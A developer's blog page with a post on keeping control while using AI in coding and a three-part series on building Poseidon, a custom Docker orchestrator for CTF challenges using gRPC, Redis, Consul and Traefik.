Stack Unwind

How I use AI in my Dev Workflow (without losing control)

Rudra Ponkshe — Fri, 28 Nov 2025 05:30:39 GMT

While building Poseidon, a custom CTF focused container orchestrator and deploying OrcaCTF on AWS, Sumit asked how I incorporate AI into my development workflow. As I explained my process, I realized I’ve subconsciously developed a systematic framework which keeps me in control while making the most of AI’s strengths.

This post isn’t about prompt engineering or which model is the best. It’s about having a methodology to ensure you use AI to accelerate your workflow without making you dependent on it or producing unmaintainable code.

My 4-phase development framework

Phase 1: Solo Architecture Thinking ( No AI yet )

Before touching any AI tool, I force a period of clean room thinking.

Take time and think through the requirements
Research options using primary documentation
Outline a couple of architectural approaches
Document trade-offs for each architecture

Example from Poseidon:

“Do I use AWS Lambda ( serverless, but 15 min execution limit ), Fargate ( managed containers, but complex per-container routing ) or build a custom orchestrator?”

Why this matters: AI defaults to the "average" solution found in its training data. It lacks the specific context of your constraints (budget, timeline, team expertise). Only you can critically evaluate these trade-offs. Skipping this step leads to generic, sub-optimal architectures.

Once I have a satisfying outline, I treat the AI (Claude is my preference here) as a "Red Team" or a Critical Reviewer. The goal isn't "tell me how to build," but "tell me where this breaks."

My validation checklist:

Edge case detection: I am choosing X over Y because of Z. What failure modes am I not considering?
Scale Analysis: Here’s my service mesh design. What breaks first at 10k concurrent users?
Operational blindspots: I’m planning to use Consul for service discovery. What are the known operational headaches?

The Goal: A theoretically stress-tested tech stack and infrastructure approach I am confident in, validated against patterns I might have missed.

Phase 3: Top-down code skeleton ( my core method )

This is where my approach diverges from “just start coding”, or “ask AI to build it”

The Process:

Define the high-level interface: Start at the highest level of abstraction using strict typing

 async def request_instance(user_id: str, challenge_id: str) -> Instance:
     pass

Think through what this method needs:
- Check user’s rate limits
- Ensure there is no existing container associated with the user
- Select the least loaded worker for deploying the container on
- Register service to Consul
- Save state to redis
- Set up routing to specific container
- Return a well-defined Instance object

Create “contract” stubs:

 async def select_best_worker() -> WorkerNode:
     return WorkerNode(node_id = "stub", address = "stub")

 async def request_spawn_container_on_worker(
     worker : WorkerNode,
     challenge_image : str
 ) -> Container:
     return Container(id="stub",ip="stub",port=8080)

 async def register_service_in_consul(
     container: Container,
     user_request: RequestChallenge
 ) -> bool:
     return True

Go deeper recursively: Each stub function gets broken down recursively into its own sub-functions until I hit the system boundaries (external APIs like Docker SDK, Consul client, Redis, etc. )
Return dummy data in the correct shape: This is critical. Each stub returns properly typed data so the top level functions can “run” ( even if they do nothing real ).

Why this works:

Control: I define the flow of execution and data structures.
Isolation: Each function has a clear, single responsibility before implementation details muddy the waters.
Debuggability: I can "run" the system with stubs to verify the logic flow before writing a single line of real infrastructure code.

Phase 4: Bottom-up implementation ( AI as pair programmer )

With the interfaces defined, I switch to implementation. I work from the bottom up; starting with the functions that touch external APIs.

This is where AI shines. Since I have isolated the logic into a single stub, I can ask the AI to "Implement this specific function using the Docker SDK." The context is contained, preventing hallucinations. Although, it is still important to review all logic used in the AI-generated code to prevent any security compromises, and to catch any unknown assumptions the AI might’ve made.

What changes during implementation:

After each sprint ( implementing a single layer ), the dummy return values in the top-level function are replaced with real data. The function signature usually stays the same, but I occasionally realize that I need additional data fields.

Example

# Initial Stub
async def provision_instance(challenge_id: str, user_id: str) -> Instance:
    worker = await select_best_worker()  # Dummy at first
    container = await spawn_container(worker, challenge_id)  # Dummy
    await register_service(container)  # Dummy
    return Instance(id="stub", hostname="stub")  # Dummy

# After implementing select_best_worker()
async def provision_instance(challenge_id: str, user_id: str) -> Instance:
    worker = await select_best_worker()  # Now returns real WorkerNode
    container = await spawn_container(worker, challenge_id)  # Still dummy
    await register_service(container)  # Still dummy
    return Instance(id="stub", hostname="stub", worker=worker)  # Partially real

The Challenge: Data Shape Consistency

A major risk in distributed systems is Schema Drift. In Poseidon, a "Worker" appears in multiple forms:

Redis: A JSON string.
Internal Logic: A Python Object.
API Response: A Pydantic model.
gRPC: A Protobuf message.

If you’re not careful, you end up with ad-hoc dictionaries {"id": ...} scattered everywhere. Debugging becomes a nightmare of key errors.

My current solution: Explicit return types annotations everywhere.

async def select_best_worker() -> WorkerNode: # forces me to return a WorkerNode
    # Can't accidentally return a dict or a string

This doesn’t solve the problem entirely, but it forces me to think about data consistency upfront rather than during debugging.

What I need to add:

Canonical Models & Conversion Boundaries

Canonical Form: A strict Pydantic model represents the entity within the application logic.
Boundaries: Data is immediately converted to the Canonical Form when it enters the system (e.g., from Redis or API) and only converted out at the last moment.

Python

# The Canonical Model (The Truth)
class WorkerNode(BaseModel):
    node_id: str
    address: IPv4Address
    load: int

# Boundary: Redis -> Canonical
def get_worker(id: str) -> WorkerNode:
    data = redis.get(id)
    return WorkerNode(**json.loads(data)) # Validation happens here

This ensures that my AI-assisted implementation code never has to guess the shape of the data. It always receives and returns the Canonical Model.

The Missing Piece: Robust Testing

I’ll be honest: I don't write enough tests. Like many solo projects, I rely heavily on manual verification, which works until it doesn't.

However, the "Top-Down" framework actually lays the perfect groundwork for a testing strategy I should be implementing. Because the system is built on isolated stubs and contracts, the path to robustness is clear, even if I haven't walked it yet:

The Plan for Unit Tests: Since select_best_worker() is an isolated stub, I can easily write a test that forces it to raise a NoResourcesAvailable error to see if the parent function handles it gracefully.
The Plan for Integration: I can mock the "System Boundary" functions (Docker/Consul) to test the orchestration logic without spinning up real infrastructure.

Right now, I am testing manually. But because the architecture is decoupled, adding these tests later won't require a rewrite; just discipline.

Why this Framework Works

Architectural Clarity: I understand the system because I designed it. Not the AI

AI as accelerator; not crutch : AI helps fill in the implementation details, not architectural decision

Debuggability: Top down structures + explicit types make it easier to trace failures

Incremental progress: Each sprint adds real functionality without breaking the overall structure.

**When this doesn’t work**

This framework isn’t universal.

While this framework is excellent for architecting complex distributed systems, infrastructure, or anything with too many moving parts, it’s unnecessary for exploratory work.

When you’re simply trying to see whether an idea is viable, forcing a top-down process is self-inflicted pain. Build the crude prototype first; confirm the thing even deserves oxygen. Likewise, in well-trodden domains, this methodology adds little value. It wastes time that could be spent actually shipping something. You don’t need a grand design philosophy to churn out yet another CRUD app.

	Simple Domain	Complex Domain
High Stakes	May be an overkill ( but safe )	Use the Framework
Low Stakes ( Learning )	Overkill, Just hack it	Use Framework (learn deeply)

TLDR: If the cost of failure is high, plan the interface. If the cost of failure is low, just build it

Lessons I learnt:

Start architectural conversations with AI, not direct implementation:
- “I’m considering X vs Y for Z reason. What am I missing?”
- Not: “Write me a container orchestrator”
Spend time designing the system before churning out actual code:
- What are the 3-5 functions I need at the top level of abstraction?
- What do they return and expect as parameters?
- What do they need from each other?
Use type annotations religiously:
- Forces consistent data shapes
- Makes AI suggestions more accurate
- Catches potential bugs at design time
Design top-down, implement bottom-up:
- Start designing with your functions acting as providers and work your way down to the functions which consume other APIs
- Implement functions talking to external APIs first and work your way up replacing stubs with real functions incrementally.
Review your data models before implementing:
- How many ways are you representing the same entity?
- Can you reduce it to one canonical form?

Conclusion

AI is an incredible accelerator for building complex systems, but only if you stay in the driver's seat.

My framework keeps architectural decisions and system invariants in my control, while delegating the implementation details to the AI. The result is a system I can operate, debug, and evolve without guessing.

Related: Building Poseidon Part 1 | Part 2 | Part 3

Building Poseidon #3: Control Plane vs Data Plane

Rudra Ponkshe — Mon, 10 Nov 2025 05:30:43 GMT

In Part 2, I built the Master-Worker orchestration core: gRPC communication, container spawning and basic routing. It worked locally. Containers spun up, users got unique subdomains and traffic routed correctly.

Then I realized the architecture had a fundamental flaw.

The Problem: Master as a Single Point of Failure

My initial design had centralized routing. The Master instance handled both Orchestration ( deciding which worker runs a container ) and routing ( directing traffic to that container ). This created two problems:

Problem 1: Availability If the Master crashed, users lost access to running containers, even though the containers were still alive on the Worker nodes. The control plane failure restricted access to the data plane.

Problem 2: Scalability The Master became a routing bottleneck. All traffic flowed through it, limiting horizontal scaling. We could add more workers, but routing capacity stays fixed.

This violates a core principle: separate the control plane from the data plane

The Solution: Service Mesh with Consul and Traefik

After reading Consul’s documentation and reading about service mesh patterns, the solution was clear:

Master ( Control Plane ): Orchestrates container lifecycle, maintaining state in Redis, registers services in Consul
Workers ( Data Plane ): Run containers, run Traefik instances, route traffic based on Consul’s service catalog
Consul: Single source of truth for service discovery and routing metadata.

The Master never touches production traffic. It just tells Consul, “container X is at IP Y on port Z with hostname H”. Every worker’s Traefik watches Consul and builds routing rules dynamically.

The New Architecture

User Request (a3f4b92c8d.orcactf.app)
    ↓
DNS Resolution (will point to NLB on AWS)
    ↓
Any Worker's Traefik (via load balancer)
    ↓
Consul Lookup: "Which IP:port has this hostname?"
    ↓
Forward to Container (possibly on different worker)
    ↓
Container responds

Key Insight: Any Traefik instance can route to any container, even if that container isn’t on the same worker. They all read from the same Consul Catalog.

This means:

Master crash doesn’t affect routing.
Routing scales horizontally ( N workers = N Traefik instances )
Clear separation: Master orchestrates, Workers route
Adding a Worker adds both compute and network routing capacity

Implementation: Service Registration in Consul

When the Master provisions a container, it now registers the service in Consul instead of updating Traefik configs:

class CatalogManager:
    def __init__(self, consul_host: str, consul_port: int):
        self.client = consul.aio.Consul(host=consul_host, port=consul_port)

    async def register_route(self, route_def: RouteDefinition, worker_node: WorkerNode):
        service_id = f"instance-{route_def.instance_id}"
        protocol = route_def.protocol.value.lower()  # 'http' or 'tcp'

        tags = [
            "traefik.enable=true",
            f"traefik.{protocol}.routers.{service_id}.rule=Host(`{route_def.hostname}`)",
            f"traefik.{protocol}.routers.{service_id}.entrypoints=challenge-web",
            f"traefik.{protocol}.services.{service_id}.loadbalancer.server.port={route_def.backend_port}"
        ]

        await self.client.agent.service.register(
            name=f"instance-svc-{route_def.instance_id}",
            service_id=service_id,
            address=route_def.backend_ip,  # Container's internal IP
            port=route_def.backend_port,
            tags=tags
        )

What’s tagged here:

Service ID: Unique identifier for this container instance
Traefik Tags: Embedding routing rules that Traefik reads from Consul
Address/Ports: Where the container is actually running ( internal Docker network IP )

When a container terminates, we de-register:

async def deregister_route(self, instance_id: str):
    service_id = f"instance-{instance_id}"
    await self.client.agent.service.deregister(service_id)

Simple. The Master completes its job of writing to Consul and moves on.

Implementation: Traefik as Consul Catalog Consumer

Each Worker runs a Traefik instance configured to watch Consul:

# traefik.yml on each worker

log:
  level: DEBUG

api:
  insecure: true # Only for local dev, will be changed in production
  dashboard: true # For debugging, will be disabled in production

entryPoints:
  traefik:
    address: ":8181"  # Dashboard

  challenge-tcp:
    address: ":2222"  # For SSH/TCP challenges

  challenge-web:
    address: ":8080"  # For HTTP challenges

providers:
  consulCatalog:
    endpoint:
      address: "127.0.0.1:8500"
      scheme: "http"

    # Only services tagged with traefik.enable=true
    constraints: "Tag(`traefik.enable=true`)"

    # Don't auto-expose everything in Consul
    exposedByDefault: false

    # Look for tags prefixed with 'traefik'
    prefix: "traefik"

Traefik polls Consul every few seconds, discovers services with traefik.enable=true, reads their tags, and dynamically generates routing rules.

No config files to update. No restarts required. Pure service discovery.

The Worker Bootstrap Process

Each Worker needs to run three processes: Consul agent, Traefik, and the gRPC worker server. We use supervisord to manage them:

[supervisord]
nodaemon=true

[program:consul]
command=consul agent -node-id=%%INSTANCE_ID%% \
  -data-dir=/consul/data \
  -config-dir=/consul/config \
  -retry-join="consul" \
  -client="0.0.0.0" \
  -enable-local-script-checks=true
autostart=true
autorestart=true

[program:traefik]
command=traefik --configfile=/etc/traefik/traefik.yml
autostart=true
autorestart=true

[program:poseidon-worker]
command=python -m src.main
autostart=true
autorestart=true

The entrypoint script generates a unique worker ID ( locally for now, will use instance ID when used on AWS ) and starts all three processes:

#!/bin/sh
set -e

INSTANCE_ID=$(uuidgen)
echo "Worker node identified as: ${INSTANCE_ID}"

# Template substitution for configs
sed "s/%%INSTANCE_ID%%/${INSTANCE_ID}/g" \
  /etc/supervisor/conf.d/supervisord.conf.template > /tmp/supervisord.conf

sed "s/%%INSTANCE_ID%%/${INSTANCE_ID}/g" \
  /consul/config/worker-service.json.template > /consul/config/worker-service.json

exec /usr/bin/supervisord -c /tmp/supervisord.conf

Each Worker joins the Consul cluster, registers health check, and starts accepting gRPC requests from the Master.

What Broke: The Traefik Tag Nightmare

This all sounds clean in retrospect. In practice, getting Traefik to generate routes correctly took hours.

The Problem: Traefik was auto-generating routing rules based on the service name (instance-svc-{uuid}), not the hostname we wanted. Users would hit a3f4b92c8d.orcactf.app, and Traefik would return 404 because it had created a route for instance-svc-3f053024-2418-4b4c-97d1-0590c5d9f480.orcactf.app.

The Root Cause: Traefik’s Consul provider has “smart” defaults which infer routing rules from service metadata. It was too smart, overriding our tags with it’s own generated rules.

The Fix: Two critical config changes:

Set exposedByDefault: false in traefik.yml
- Forces Traefik to only process services explicitly tagged with traefik.enable=true
- Disables auto-route generation
Use explicit router rules in tags:
```
 f"traefik.{protocol}.routers.{service_id}.rule=Host(`{route_def.hostname}`)"
```
- Overrides Traefik’s default rule generation
- Ensures we control the hostname matching logic

After these changes, routes worked perfectly. But this took reading through Traefik’s Consul provider documentation quite a few times to understand the rules.

Lesson learned: When integrating tools that "just work," the hard part is understanding what they do automatically and how to override it when needed.

What’s Still Missing

This works locally. AWS deployment will add complexity:

Network Load Balancer:

Currently testing with direct Traefik access. In production, a NLB will front all workers, and the flow becomes
```
 DNS → Route53 → NLB → Worker Traefik → Container
```
Multi-node Consul Cluster

Right now, we have a single Consul server. If we ever scale this, we’ll need a 3-node cluster for HA (high availability). If Consul dies, routing goes down.
VPC Networking:

Workers need appropriate security group rules allowing inbound traffic from the NLB, inbound access from other workers and outbound to other workers
TLS/HTTPS:

Currently running on HTTP only, we need to implement Traefik’s TLS termination and Let’s Encrypt/AWS Certificate Manager
The Reaper Proces:

Containers have TTLs. We need a background process that:
- Polls Redis for expired instances
- Call deprovision_instance() for each of them
- Handle orphaned containers ( if Master crashes before cleanup )

This is infrastructure work, not architecture work. The hard part of designing and implementing the system is done.

Failure Mode Analysis

Let's validate that we actually improved resilience:

Failure	Old Architecture	New Architecture
Master Crashes	Routing dies, users disconnected	Routing unaffected, orchestration paused
Worker Crashes	Only it’s containers die	Only it’s containers die, NLB removes from pool
Traefik crashes (single)	All routing dies	Other Traefik’s compensate
Consul crashes (single node)	N/A	Routing breaks (needs multi-node cluster)

Net improvement: I eliminated the "Master down = routing down" failure mode, which was the biggest architectural risk.

Horizontal Scaling: The Math

Old architecture:

1 Master with Traefik = fixed routing capacity
Add workers = more compute, same routing bottleneck

New architecture:

N workers = N Traefik instances = N × routing capacity
Add worker = more compute AND more routing capacity

Example: If each Traefik can handle 1000 req/sec:

1 centralized Traefik = 1000 req/sec max
5 workers with Traefik = 5000 req/sec max (behind NLB)

This scales routing capacity horizontally, not just compute capacity.

Lessons Learned

1. Control/Data Plane Separation is Real

This isn't just theory from distributed systems textbooks. The moment you separate "who decides" from "who executes," resilience improves dramatically.

2. Service Mesh Reduces Coupling

Master doesn't know about Traefik. Workers don't know about routing logic. Consul is the only shared dependency. This means:

We could swap Traefik for Nginx without touching the Master
We could change scheduling logic without touching Traefik
Each component has a single, clear responsibility

3. Tool Documentation Matters More Than You Think

The Traefik tag issue cost hours because I assumed defaults would work. Reading the Consul provider docs thoroughly upfront would have saved time.

4. Test Failure Modes Early

Spinning up multiple workers locally and killing processes randomly validated the architecture way before AWS deployment. If it doesn't work with 2 local workers, it won't work with 10 EC2 instances.

The system works. Now we need to make it production-ready.

Follow along as I continue building Poseidon. The code will be open sourced one we’re deployed and test on AWS infrastructure.

Previous Posts: Part 1 | Part 2

Building Poseidon #2: The Master-Worker Dance

Rudra Ponkshe — Mon, 03 Nov 2025 05:30:15 GMT

In Part 1 of Building Poseidon, we established why we’re building Poseidon instead of using existing solutions like Kubernetes or AWS Fargate. We need instance-specific routing, fine-grained lifecycle control, and cost-effective operation within the AWS free tier.

Now comes the challenging part: Actually building it.

Talk is cheap, show me the code - Linus Torvalds

This post dives into the master-worker communication protocol, the orchestration logic that schedules containers across workers, and the real-world problems we hit along the way. Everything described here is running on my local machine right now, AWS deployment comes later.

The Architecture: A Quick Recap

Poseidon follows a two-process model:

Master Process: Exposes a REST API to OrcaCTF’s backend, maintains global state in Redis, orchestrates container lifecycles across workers.
Worker Process: Run on compute nodes, interface with Docker daemon, spin up containers and report status back to the master.

The Master in itself doesn’t know ( or care ) about what kind of images it’s running. It’s a dumb executor that receives requests like:

{
  "user_id": "litmus",
  "challenge_id": "localhost:5000/orca-challenges/our-first-challenge:latest",
  "mem_limit": 256,
  "nano_cpus": 5000000,
  "protocol": "http"
}

It returns a unique hostname when the users requested container is accessible.

The Communication Protocol: REST for Clients, gRPC for Workers

Early on, I had to decide: how should the master and worker talk to each other?

The Decision: Hybrid Approach:

Master <→ Frontend/Backend: REST API

OrcaCTF’s backend makes simple HTTP requests to start/stop containers
Easy to debug with cURL, integrates with existing FastAPI infrastructure
No need for client ( OrcaCTF backend ) side gRPC dependencies

Master ←> Workers: gRPC

Workers are internal infrastructure, not exposed to users
Need high performance, low latency communication for container operations
Strong typing via Protocol Buffers. Catches integration bugs early
Bi-directional streaming support which can be used for real-time logs and metrics

This isn’t an either-or decision. REST is great for public APIs whilst gRPC is better for internal service-to-service communication where performance and type-safety matters.

The gRPC Protocol Definition

Here’s our .proto defining the worker service:

syntax = "proto3";
package poseidon.worker;

service WorkerService {
    rpc SpawnContainer(SpawnRequest) returns (SpawnResponse);
    rpc TerminateContainer(TerminateRequest) returns (TerminateResponse);
    rpc GetWorkerStatus(WorkerStatusRequest) returns (WorkerStatusResponse);
}

message SpawnRequest {
    string request_id = 1;
    string image_name = 2;
    int32 start_timeout_seconds = 3;
    int32 mem_limit = 4;
    int32 nano_cpus = 5;
}

message SpawnResponse {
    string container_id = 1;
    string internal_ip = 2;
    int32 internal_port = 3;
    bool success = 4;
    string error_message = 5;
}

message TerminateRequest {
    string container_id = 1;
}

message TerminateResponse {
    bool success = 1;
    string error_message = 2;
}

message WorkerStatusRequest {}

message WorkerStatusResponse {
    string node_id = 1;
    float cpu_usage_percent = 2;
    float memory_percent = 3;
    int32 container_count = 4;
}

Key design decisions:

SpawnResponse returns the internal IP and port. The master needs to know where to route traffic. Containers run on a shared Docker network, so we use internal IPs, not published ports.
success+error_message patterns. Workers can fail for many reasons ( image pull failure, resource exhaustion, Docker daemon issues ). Explicit success flags make error handling cleaner than relying on gRPC status codes alone.
GetWorkerStatus for load balancing: Workers periodically report CPU, memory and container count. The master uses this for intelligent scheduling.

Worker Discovery: Why Consul?

One of the first problems, how does the master know which workers exist and whether they’re healthy?

We could maintain a worker registry in Redis, but that introduces a new failure mode: what if a worker crashes without deregistering itself? The master would keep sending requests to a dead worker.

Enter Consul

Consul is a service mesh solution that handles service discovery and health-checking. Workers register themselves with Consul on startup, and Consul continuously health-checks them via gRPC’s health protocol.

Why Consul over Manual Health Checks?

Separation of Concerns: The master doesn’t have to implement heartbeat logic. Consul does that out of the box.

Graceful draining: When we deploy to AWS, the worker instances will be behind a Load Balancer, which may decide to de-provision a worker if the load isn’t high. Workers can then set a “draining” status in their health check responses, so Consul can inform the master to not schedule any new instances on the node while the existing containers complete their tenure and request for extensions are denied.

Proven reliability: Consul is battle-tested infrastructure. We’re not re-inventing service discovery.

The Master queries Consul for healthy workers and gets back a list of (node_id, address) pairs. Simple.

The Orchestration Flow: From Request to Running Container

Let’s walk through what happens when a user clicks “Start Challenge”

Phase 1: Worker Selection ( Scheduling )

The Orchestrator asks the Scheduler for the best available Worker:

selected_worker = await self.scheduler.get_best_worker()
if not selected_worker:
    raise RuntimeError("No available workers to handle request")

The scheduler implements a weighted score system:

cpu_weight = 0.5
mem_weight = 0.3
container_weight = 0.2

score = (cpu * cpu_weight) + (mem * mem_weight) + (container_count * container_weight)

Workers with lower scores ( less loaded ) are preferred. This is a simple heuristic, not a sophisticated bin-packing algorithm, but it works at our expected scale.

The Scheduler polls all workers every 15 seconds via GetWorkerStatus, caching their metrics in Redis. When a container request arrives, it picks the worker with the lowest score from the cached data.

Trade-off: There’s a 15 second window where Worker stats might be stale. A worker could become overloaded between polls, and the scheduler wouldn’t know. For our use case (15-20 concurrent users) this should do the trick. When we scale and need real-time accuracy, we could poll more frequently, or use event-driven updates.

Phase 2: Container Spawn

Once a worker is selected, the Orchestrator sends a gRPC SpawnContainer request:

running_container = await self.worker_client.spawn_container(
    selected_worker,
    challenge_id,
    instance_id,
    mem_limit,
    nano_cpus
)

On the Worker side, this triggers DockerManager:

def run_container(self, image_name: str, instance_id: str, 
                  mem_limit: int | None, nano_cpus: int | None) -> Container:
    memory_limit_str = f"{mem_limit}m" if mem_limit else "256m"

    try:
        container = self.client.containers.run(
            image=image_name,
            detach=True,
            auto_remove=True,
            labels={"poseidon.instance_id": instance_id},
            network=self.network_name,
            mem_limit=memory_limit_str,
            nano_cpus=nano_cpus
        )
        return container
    except ImageNotFound:
        logger.warning(f"Image '{image_name}' not found locally. Pulling...")
        self.client.images.pull(image_name)
        return self.run_container(image_name, instance_id, mem_limit, nano_cpus)

Key Details:

auto_remove: True: Containers are ephemeral; When they stop, Docker automatically cleans them up
labels={"poseidon.instance_id": instance_id} : Labels enable visibility. Having descriptive labels like this helps in pinpointing the sources of any issues. Traefik ( our reverse-proxy ) can also be configured to route traffic depending on these labels
Automatic image pulling: If the challenge image isn’t cached locally, the worker pulls it. This adds latency on the first request, but simplifies deployment.

Phase 3: Network Discovery

After the container starts, the worker needs to determine it’s internal IP and report it along with the port it is serving the container on. This is trickier than it sounds.

Containers run on a shared Docker network. We don’t use published ports because that would require dynamic port allocation and port conflict handling. Instead, containers expose their services on an internal port ( like 8080 for HTTP challenges ), and Traefik routes traffic based on the hostname.

def get_container_details(self, container_id: str) -> dict | None:
    container = self.client.containers.get(container_id)
    container.reload()

    # Get IP from the shared network
    network_settings = container.attrs['NetworkSettings']['Networks'][self.network_name]
    ip_address = network_settings['IPAddress']

    # Get the internal port from the image's EXPOSE directive
    exposed_ports = container.attrs['Config']['ExposedPorts']
    internal_port_str = list(exposed_ports.keys())[0]  # e.g., "80/tcp"
    internal_port = int(internal_port_str.split('/')[0])

    return {
        "id": container.id,
        "ip_address": ip_address,
        "internal_port": internal_port,
    }

This relies on challenge images correctly declaring their exposed ports via EXPOSE in the Dockerfile. If the challenge doesn’t expose a port, this logic fails. This is intentional as it helps catch misconfigurations early.

Phase 4: State Management and Routing

Once the container is running, the Orchestrator:

Generates a unique hostname: sha256(instance_id)[:12].

Saves the instance metadata to Redis

  instance = Instance(
         instance_id=instance_id,
         user_id=user_id,
         challenge_id=challenge_id,
         worker=selected_worker,
         hostname=f"{external_hostname}.local",
         container_id=running_container.container_id,
         internal_ip=running_container.internal_ip,
         internal_port=running_container.internal_port,
         created_at=now_ts,
         expires_at=now_ts + cfg.default_ttl_seconds
     )
     await self.state_manager.save_instance(instance)

Creates a routing rule in Traefik

      route_definition = RouteDefinition(
             instance_id=instance.instance_id,
             protocol=protocol,
             hostname=instance.hostname,
             backend_ip=running_container.internal_ip,
             backend_port=running_container.internal_port,
         )
         self.proxy_manager.create_route(route_definition)

Traefik now knows: “traffic to a3f4b92c8d.local should go to 172.18.0.5:80.

The user receives their unique URL, and can connect immediately.

What broke ( and how we fixed it )

Problem 1: Silent Deployment Failures

Early on, containers were failing to start, but the Orchestrator was reporting success. The issue? We weren’t checking the gRPC response properly

if not running_container.success:
    raise RuntimeError(f"Failed to spawn container: {running_container.error_message}")

Now, if the worker reports success=False, the Orchestrator propagates the error up to the User. Simple, but easy to miss.

Problem 2: Docker Networking Hell

Getting Traefik to reliably discover containers on the shared Docker network took far longer than expected. Containers were starting, but Traefik couldn’t route to them.

The issue was that Traefik was looking on the wrong network. We had to explicitly configure

network=self.network_name  # Must match Traefik's configured network
# An environment variable stored the value of self.network_name and initialized when the Orchestrator spawned

And ensure that Traefik was itself running on the same Docker network. Obvious in hindsight, nothing short of painful in practice.

Problem 3: CPU Limits don’t work in Docker-in-Docker

We’re running workers as Docker containers themselves ( for local testing ), but Docker-in-Docker doesn’t support nano_cpus limits properly. The inner containers inherit the outer containers limits, not their own.

For now, we’ve accepted this limitation. On AWS EC2 instances ( where Docker runs natively ), CPU limits will work as intended. But it’s a reminder that abstractions leak, and testing in production-like environments matter.

What’s next

This post covered the orchestration core: worker discovery, container spawning, and state management. But we're not done. We will explore the containment and resilience: isolation, resource control and ensuring the system can shut down gracefully without abandoning active users.

Follow along as we continue building Poseidon. The code will be open-sourced soon after we test a deployed PoC.

Building Poseidon #1: Why we're not using Kubernetes

Rudra Ponkshe — Mon, 27 Oct 2025 05:30:08 GMT

💡

TL;DR: Built Poseidon, a custom container orchestrator for CTF challenges. Evaluated Lambda (runtime limits), Fargate (no per-container routing), and Kubernetes (complexity overkill). Went with a master-worker architecture using Docker SDK, Redis, and subdomain-based routing. Targets 15-20 concurrent users on AWS free tier. Open-sourcing soon.

The Problem: CTF Challenges Need Dynamic Infrastructure

Capture The Flag (CTF) competitions have evolved significantly. Modern challenges often require isolated, interactive environments where participants can exploit vulnerabilities, reverse engineer binaries, or manipulate web applications in real time. These aren’t static challenges; they are live systems that need to be spun up on demand, accessible over the internet and then torn down after use.

For my Cloud Computing course project, my team is building OrcaCTF. The vision was simple, students click a “Start Challenge” button, and within seconds they get a dedicated Docker container with a unique URL to connect to. The challenge runs for a set duration ( with extensions possible based on server load ), and then automatically cleans itself up.

Targeting 15-20 concurrent users initially, and an architecture that could scale far beyond that, we needed fine-grained control over container life-cycle, resource limits and networking. And we needed to do all of it on AWS free tier.

The question became, what’s the best way to orchestrate ephemeral Docker containers in the cloud?

Evaluating the Serverless Landscape

My first instinct was to leverage serverless services. After all, for a Cloud Computing course, surely AWS or Azure would have pre-built solutions for this exact use case, right?

AWS Lambda + API Gateway

The Promise: Serverless functions ( with Docker container support ) which scale to zero, pay only for what you use and handle thousands of concurrent requests

The Reality: Lambda has a maximum runtime of 15 minutes. CTF challenges may take from 30 minutes to several hours. Participants also usually need to step away and return to their environment. Lambda’s ephemeral nature and strict time limits made it a non-starter.

AWS Fargate

The Promise: Serverless containers, just specify your Docker image, and the Cloud handles the rest.

The Reality: These services, while really convenient, are designed for microservices architecture where instances are interchangeable and load balanced. They are meant for instance-agnostic workloads.

We needed the opposite: Instance-specific routing. Each user needs their own container accessible via a unique subdomain like a3f4b92c8d…orcactf.app. Fargate abstracts away containers behind load balancers. Getting traffic to a specific container would require complex workarounds, and the solution would be tightly coupled to AWS-specific networking constructs.

AWS App Runner

Similar story, great for deploying web services, but not so much for orchestrating user-specific ephemeral environments with custom networking requirements.

Why not Kubernetes or Docker Swarm?

The elephant in the room: Why not use battle tested orchestration platforms?

Kubernetes is incredibly powerful, but it’s also incredibly complex. Setting up a cluster, managing nodes, configuring ingress controllers, wrangling pods vs deployments vs services; it’s a steep learning curve. For a project that has to go from zero to prototype in a month, K8s felt like bringing a cargo ship to a river rafting trip.

Moreover, Kubernetes is general-purpose by design. It is meant to manage long-lived services, rolling deployments and complex distributed systems. Our use case is much simpler: spin up a container, keep it alive for a few hours at maximum, and then clean it up. We don’t need auto-healing deployments or blue-green rollouts. We need ephemeral, user-scoped container lifecycle management.

For our timeline and expertise level, Kubernetes might be an overkill for the current projected scale of the project.

Docker Swarm has a gentler learning curve, but it’s still designed for orchestrating services across clusters, not managing per-user container instances with custom routing.

Both options also add operational overhead: cluster management, control plane High Availability (HA), storage orchestration, network policies. I’d be spending more time fighting the orchestrator than actually building the platform.

The Case for Building Custom: Enter Poseidon

After evaluating the existing landscape, I was reaffirmed of my assumption that our use case is very niche, and the existing tools are not optimized for it. They’re designed for microservices ( many identical deployments behind a load balancer ) or long-lived services ( always running, scaled horizontally ). CTF challenges are neither.

So I decided to build Poseidon. Keeping with the marine theme of OrcaCTF, Poseidon is our ‘orchestrator of the deep’, a purpose-built engine which is designed to be simple and performant.

Core Requirements:

Absolute Control Over Container Lifecycle
- Spin up containers on-demand
- Enforce resource limits (CPU, memory, disk)
- Support custom timeouts with user-requested extensions
- Clean shutdown and cleanup
Instance-Specific Routing
- Each container gets a unique subdomain: .orcactf.app
- Traffic must route to the specific container, not a pool
- SSL/TLS termination for all subdomains
- Support for SSH, HTTP connections
Cloud-Agnostic Architecture
- Should work on AWS, Azure, GCP, or bare metal
- No vendor lock-in via proprietary services
- Portable enough to open-source and let others deploy
Observable & Debuggable
- Comprehensive logging and tracing
- Real-time metrics (Prometheus + Grafana)
- Easy visibility into what's happening under the hood
Cost-Effective
- Run on EC2 instances within AWS free tier
- Efficient resource utilization
- No per-container pricing overheads

Quick note: I'm building this in parallel with writing about it. Some details will evolve as we discover what works.

Architecture Philosophy: Simplicity over features

Poseidon follows a two-process model:

Master process: Runs alongside OrcaCTF’s other backend services. Handles API requests, maintains state in Redis, schedules containers across workers and monitors health.
Worker process: Runs on one or more EC2 instances. Receives commands from the master, spins up Docker containers, adds helpful labels to help in routing and reports status back.

The design is intentionally minimal. We’re not trying to compete with Kubernetes. We’re solving a specific problem with the simplest architecture that works.

The User Experience:

Let’s walk through the expected UX when a student wants to run a challenge:

Phase 1: Request ( User → Backend )

User clicks "Start Challenge" on the OrcaCTF frontend
Frontend calls backend API, which validates the user's token and permissions
Backend returns "pending", triggering a loading spinner

Phase 2: Orchestration ( Backend→Poseidon)

Backend calls Poseidon Master, passing challenge details and user ID
Master verifies the user doesn't have an active instance running
Master selects a worker (load balancing strategy TBD) and sends a work request
Worker spins up the Docker container, setting labels for routing
Worker performs health check, then reports success to Master
Master updates Redis state with the container's unique subdomain

Phase 3: Connection and cleanup ( User → Container )

Frontend polls backend until status changes to "ready"
User receives their unique URL: a3f4b92c8d...orcactf.app
Traffic is routed to the specific container based on subdomain
After timeout expires (or user terminates early), container is cleaned up

All of this happens quickly, with zero manual intervention.

Why Open-Source?

